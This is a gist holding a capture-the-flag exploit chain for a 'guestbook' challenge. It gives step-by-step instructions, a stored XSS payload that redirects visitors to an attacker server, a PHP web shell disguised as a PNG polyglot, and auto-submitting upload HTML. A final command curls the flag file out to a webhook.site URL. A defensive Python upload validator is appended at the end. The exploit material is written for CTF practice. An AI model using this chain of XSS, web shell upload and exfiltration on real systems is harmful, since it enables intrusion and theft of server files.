@st98
Last active March 17, 2021 19:13
BingoCTF - guestbook

guestbook

  1. Generate the payload with gen_payload.php
  2. Put exploit1.html, exploit2.html, and the generated payload.bin on your Web server
  3. Post `</textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit1.html`</script><textarea>`
  4. Fix the filename in exploit2.html from payload_0.6719151792598002.php to payload_(value shown in logs).php
  5. Post `</textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit2.html`</script><textarea>`
base.php

```php
<?php shell_exec($_GET['cmd']);
```
exploit1.html

```html
<form method="POST" enctype="multipart/form-data" action="http://private/upload.php" id="form">
<input type="text" name="submit" value="ok">
<input type="file" name="fileToUpload" id="up">
<input type="submit" id="go">
</form>
<script>
(async () => {
  const form = document.getElementById('form');
  const up = document.getElementById('up');
  // Fetch the generated payload.bin from this server and wrap it as a PNG-typed blob
  const content = await fetch('/payload.bin').then(resp => resp.blob());
  const blob = new Blob([content], { type: "image/png" });
  // Random filename; it is recorded via log.php so it can be filled into exploit2.html (step 4)
  const filename = 'payload_' + Math.random() + '.php';
  await fetch('/log.php?filename=' + filename);
  // Populate the file input programmatically and submit the form
  const file = new File([blob], filename);
  const dt = new DataTransfer();
  dt.items.add(file);
  const list = dt.files;
  up.files = list;
  const go = document.getElementById('go');
  go.click();
})();
</script>
```
exploit2.html

```html
<script>
location.href = "http://private/uploads/payload_0.6719151792598002.php?cmd=" + encodeURIComponent('curl "https://webhook.site/e9ad957a-4480-44ff-b428-3324b77c15f0" -F a=@/flag');
</script>
```
gen_payload.php

```php
<?php
// Prefix the PHP file with the first 100 bytes of a real PNG so the upload
// looks like an image to a check that only inspects the leading bytes.
$a = file_get_contents('base.png');
$b = file_get_contents('base.php');
file_put_contents('payload.bin', substr($a, 0, 100) . $b);
```
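Added here as an illustration from the defender's side, not part of the gist: a hypothetical Python upload validator showing why a magic-byte check (the kind a 100-byte PNG prefix defeats) is insufficient, next to a stricter check that walks the full PNG chunk structure and an extension allowlist. The minimal PNG and the polyglot sample are constructed inline; `accept_upload` and `ALLOWED_EXT` are assumed names, not the challenge's upload.php.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Build one PNG chunk: length, type, data, CRC32 over type+data."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def minimal_png() -> bytes:
    """Constructed sample input: a valid 1x1 RGB PNG (not taken from the gist)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, colour type 2 (RGB)
    idat = zlib.compress(b"\x00\x00\x00\x00")             # filter byte + one black pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")

# Constructed polyglot in the style of gen_payload.php: a PNG prefix followed by non-image text.
POLYGLOT = minimal_png()[:40] + b"<?php /* appended text */ ?>"

def naive_is_png(data: bytes) -> bool:
    """Weak check: only the 8-byte signature, so a PNG prefix with anything after it passes."""
    return data.startswith(PNG_SIG)

def strict_is_png(data: bytes) -> bool:
    """Strict check: every byte must belong to a CRC-valid chunk and the file must end at IEND."""
    if not data.startswith(PNG_SIG):
        return False
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc) != 4:
            return False                    # truncated chunk
        if struct.unpack(">I", crc)[0] != zlib.crc32(ctype + body):
            return False                    # corrupted or foreign bytes inside a chunk
        pos += 12 + length
        if ctype == b"IEND":
            return pos == len(data)         # trailing data after IEND is rejected
    return False                            # no IEND reached

ALLOWED_EXT = {"png"}

def accept_upload(filename: str, data: bytes) -> bool:
    """Hypothetical server-side policy: extension allowlist AND full structural validation."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED_EXT and strict_is_png(data)
```

The gist's upload name ends in `.php`, so the extension allowlist alone would have stopped it; the structural check covers the case where the name is acceptable but the content is not.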